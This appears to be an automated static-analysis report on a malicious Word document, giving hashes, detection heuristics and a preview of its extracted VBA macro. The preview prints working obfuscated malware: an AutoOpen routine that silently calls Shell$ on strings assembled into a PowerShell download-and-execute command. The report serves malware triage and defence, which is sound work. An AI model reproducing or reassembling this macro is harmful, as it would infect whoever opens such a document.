Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 164245625fabdfc0…

MALICIOUS

Office (OLE)

Size: 114.0 KB | Created: 2017-11-15 07:58:00 | Authoring application: Microsoft Office Word | First seen: 2017-11-20
MD5: 2a920dfc7b5ab2eff8ac8df93617a697
SHA-1: 7db3a3225c41ebae4b114ecaf473edf2af003350
SHA-256: 164245625fabdfc0af1296b6deb4cccce5aab179c973d9f5659be9f4b3fce51d
Risk Score: 304

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a malicious Office document containing obfuscated VBA macros. The AutoOpen macro uses the Shell() function to execute a payload, likely a downloader. The VBA code is heavily obfuscated, making it difficult to determine the exact payload or destination URL without dynamic analysis. The presence of Shell() and the obfuscated loader strongly indicate a macro-based malware delivery.

Heuristics (9)

  • ClamAV: Doc.Macro.Obfuscation-6355576-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Macro.Obfuscation-6355576-0
  • VBA macros detected [medium, 4 related findings, OLE_VBA_MACROS]
    Document contains VBA macro code
  • Shell() call in VBA [critical, OLE_VBA_SHELL]
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader [critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER]
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro [high, OLE_VBA_AUTOOPEN]
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 103571 bytes
SHA-256: 0237e93f6598573d84dd78ae6f8eee99a51035045893fdfcea1c899ffca9a974
Detection
  ClamAV: No threats found
  Obfuscation or payload: likely
  Carved artifact contains 56 long base64-like blob(s).
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "UASqQEwzT"
Sub AutoOpen()
ucDjnjrBc = "wqNhNazXK" + "cbhKjCvpO" + "HCXKAQNhS" + "PJEjidsfd"
Shell$ HbOjpVVcN, 0
vXUYScSuC = "PkwAozVjw" + "EnpwUjIiN" + "FvzDRBYAS" + "ujkvsFNzw"
End Sub
Function HbOjpVVcN()
YQsfpbcTo = "XAADD3pNC7ZrZPBJQQaOFjauJhQWZpOhGwMBzqqoSlQsPQRqmFQiEdVQbOhMzsJcjNmZDzKaZmwTThitQajUYfdcavZkJirZboMCdrnmuqJShCzujnwWIpDBkKwHaaQuvWrfVcPYnwZhWKvYwfAViUQmkKRTtfMUZOXKKRYHXXjLQViZOaJuauMaFFuKLwfHW40"
THYAKvkm = Mid(YQsfpbcTo, 14, 179)
ijuiwwGiH = Array(37, 73, 58, 15)
fqQfuWET = Array(11, 62, 47, 94)
KfVPpzf = Array(54, 93, 63, 68)
hPbnGwz = "FKtboHdYNrdcssv0PCr04YFjwPdNYknhrmdqNiHQbUobilCtrvWoNzUQCfwqqlQHCtOiQQompzYZLRlMNkVdOzUuRNnhkQapEhYoWTcbGkwOZuFkuldFPmsDZURDcHCZYiVdtwqtIuWiAGUWHDmzmVaRpVPBCYzkDbIV0n063Awk"
JtzQcawd = Mid(hPbnGwz, 25, 135)
NuPaH = Array(83, 87, 36, 16)
kWjliEp = Array(23, 95, 85, 56)
QHzXT = Array(47, 80, 47, 41)
dQnOhK = "jVUzziwsDzMQ5WAaiIzDkEIInlNjGtzKkFWOjsESVRufBwEFXOwbscbLNWldMdohwCpAjfiSrMlSKcGrhIJswWRIdKBJGbGsdNizGDWrkdjjqIBkQuwDUwkakhWYiULQFtpwuGkdlRITnlSVJQtMfCYhdHPZjzMPRTazTEqJJSRCnQnzPBOOazkCUHTmrLwnFsBTKUBEakCNkVtMUPKfiwpSiXcD01X"
KKMnbVH = Mid(dQnOhK, 21, 199)
TAbpptdXiof = Array(19, 30, 77, 71)
OtGSPwiPJMb = Array(24, 11, 34, 99)
PuDJHFFmV = Array(86, 20, 55, 13)
hTiGzQ = "qEXnXvKbvStsQViUdUIFhzQzcWiwurbbOVdw3Ht7mjq7q0"
RGBhzpm = Mid(hTiGzQ, 3, 26)
Micvd = Array(38, 65, 56, 58)
FOriFYf = Array(49, 99, 50, 27)
drJvvjkL = Array(60, 20, 15, 36)
JYCuDUAR = "wZJvBRvGMSWWJoWNMwXMDIhlCjVhoKIoFnOhwiraACJquOOjRvvsWTjl"
UBuFrhFzUQY = Mid(JYCuDUAR, 10, 44)
lLCEGfUsn = Array(49, 34, 27, 43)
rhWNmaLAu = Array(88, 50, 45, 39)
cJdrw = Array(89, 52, 31, 99)
XDArh = "LprZd7MrDj05XSZOjMVul1R1lGCX8lHCjlmspTWRErGYzzBaPfYJzVLFdzilqzEYptfiCCKqRYsfLaQJQBlmjzDOZjPrpkbGnijERTXNViracfuDhUVoMRsrpRIWnSBhwmsdqLswdXRzGdmulLKUPmuVpsOALAaCjKdpnRMVcYKoAulMfOkbIjRKrXnwzrldwOQvzwGUzorqbGUuGCVzPzuAtTUu6j"
nkPoFCzvm = Mid(XDArh, 31, 188)
ipiLXVAOZnw = Array(67, 91, 73, 80)
oVDRQ = Array(24, 51, 46, 82)
zEbqdYw = Array(85, 92, 75, 77)
pZjlQ = "ESQw4P8a1klWojXccuQtirMlDSwVdwvPTpuzKoqzXSzOGRbBRF5EZYEmijww4i9"
BzAVoWHWIa = Mid(pZjlQ, 23, 28)
dsamMAfL = Array(92, 54, 17, 25)
wTTJPBC = Array(55, 40, 84, 12)
fNbYwEZQZ = Array(90, 81, 46, 34)
UMhSBo = "wBEkUv1KWpEJsfBrDamrjzaECRMjWzZIQFdEKwJKLGXQLUbQkGBqSiXUbBCXsIbWaGrlBzhGRbfcaJtipvzPwjphiJdIumSDiAqFdpPnZuZqDutSIUhzJMYqQJDrTYMfJcwaToFzfLpDKzdoQKzZEVtSbzoTmXTAithbvTwUPhRzWUjRfPbJZnanifwTzlNIsoVQRCswMfKWEvwHSCQ0s308FRzmBTI"
wwSskhpm = Mid(UMhSBo, 14, 196)
ijXswPCTr = Array(35, 42, 50, 52)
UzStOfDjlb = Array(80, 62, 71, 29)
HpFbGjUImF = Array(18, 26, 33, 56)
LFlGjvUZB = "bGEUYYziZprYbrwvkzVQOCSAuwZUCmDHEoXhoqjvXwbRdwfLoDCXFBaTwBIcZifnmjTnURHtNZsSaBWvQNfwjfCDNDkmhHVsRoitisrXwJJfIIsvfMMMzjEGjQQZqF6TZwwj"
YjRZjim = Mid(LFlGjvUZB, 7, 116)
baQwF = Array(53, 33, 85, 72)
LHazu = Array(73, 63, 30, 30)
RVVbCV = Array(55, 49, 88, 50)
MKnVu = "MFZ0Oj0ODV4ZQjULGEABmWcRXVIBZVXuFLpHVuItkkYNNSbrczDbIHGYCvorriikIVUEqNqLvGQCzPDFtQZbSwmzFRFaGRCGFoEswWAOHrQ0OoqkmRCEI9DOUw3SiI77LO1"
SPNAXIW = Mid(MKnVu, 12, 95)
DziKHD = Array(83, 29, 19, 87)
SfiFwFLR = Array(59, 59, 73, 32)
AGAwzfj = Array(74, 26, 61, 27)

YQsfpbcTo = "TM1AzppY7EnTieachiv8L+v8L'+'eehi+ehivem'+'ents.cv8L+v8Lom/nOv8L+v8LXv8L+v8LubLyf/KNlv8L+v'+'8L.Split(K'+'Nl,v8L+v'+'8LKNl);v8L+eh2vQ"
THYAKvkm = Mid(YQsfpbcTo, 14, 116)
ijuiwwGiH = Array(37, 73, 58, 15)
fqQfuWET = Array(11, 62, 47, 94)
KfVPpzf = Array(54, 93, 63, 68)
hPbnGwz = "Y9ZM7lr7JZERk0rHXNvKZ4zFLKNlv8L,[CHaR]39)sP1 .( MnvpshOmE[4]+MnvpShoME[30]+v8Lxv8L)ehi)-cREPlaCe  ehiMnvehi,[CHAr]36 -rEplAce ([CHAr]WJO07nkRhl41J"
JtzQcawd = Mid(hPbnGwz, 25, 109)
NuPaH = Array(83, 87, 36, 16)
kWjliEp = Array(23, 95, 85, 56)
QHzXT = Array(47, 80, 47, 41)
dQnOhK = "SI41KGRipFFruI76GhfWm('+'bKv8ehi+ehiL+ehi+ehiv8Lc
... (truncated)